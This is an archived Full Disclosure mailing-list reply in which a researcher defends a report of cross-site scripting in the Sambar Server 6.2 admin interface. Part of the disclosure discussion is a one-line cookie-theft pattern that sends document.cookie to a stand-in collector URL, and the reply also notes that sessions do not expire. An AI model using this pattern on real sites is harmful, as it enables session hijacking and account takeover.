Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: XSS in Sambar Server version 6.2
From: jamie fisher <contact_jamie_fisher () yahoo co uk>
Date: Tue, 24 May 2005 21:30:13 +0100 (BST)

"A user can input a specially crafted script that when rendered by the

Hopefully you can explain:

"Multiple XSS found in the administrative interface."

 This kind of pre-supposes the idea that a user has access to the administrative interface.  The tests I ran were 
purely looking at what somebody with priviliged rights could have effected within the application.  For 
clarification, a user is by default somebody who is "identified" and then "authorised" to the system.  In the case 
of Sambar Server version 6.2 this is done through the mandatory access control of username and password.  The system 
in this case is the "administrative interface".

Granted, the XSS is a very low level vulnerability.  However, combine the XSS with the ability to (document.cookie) and 
a document.location="http://domain.com/cookiecollector.pl"; which logs the users cookie then this becomes more of an 
issue.  Incidentally, did you know the application does not expire session states, i.e., if I log off or kill my 
session with the browser or otherwise and a miscreant (somebody who uses a Lynx browser) , e.g., You, conspires to 
obtain my user identity - in this case we're using the example of the cookie - then certainly this issue certainly 
becomes one of a high level issue.

From personal experience I know you've run across plenty of XSS issues before, we've both discussed where we've 
collided in previous job roles.  I guess, in a nut shell it shows how little input/output validation is occuring 
throughout the application and what a user if so inclined, can force the application into rendering.  But really, I 
used to point out input/output validation issues to you along with the other stuff you used to miss in your web 
application pen tests.
P.S. There'll be plenty of other issues (other than XSS) I'll publish re: Sambar Server 6.2.  I haven't got a problem 
if you would like to work with me in researching bugs/problems/issues.  It's just a matter of trying to work with the 
vendor to help find understand the issues/apply a patch.  And btw, this isn't a personal attack against you either =)

Does your mail provider give you FREE antivirus protection? 
Get Yahoo! Mail
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]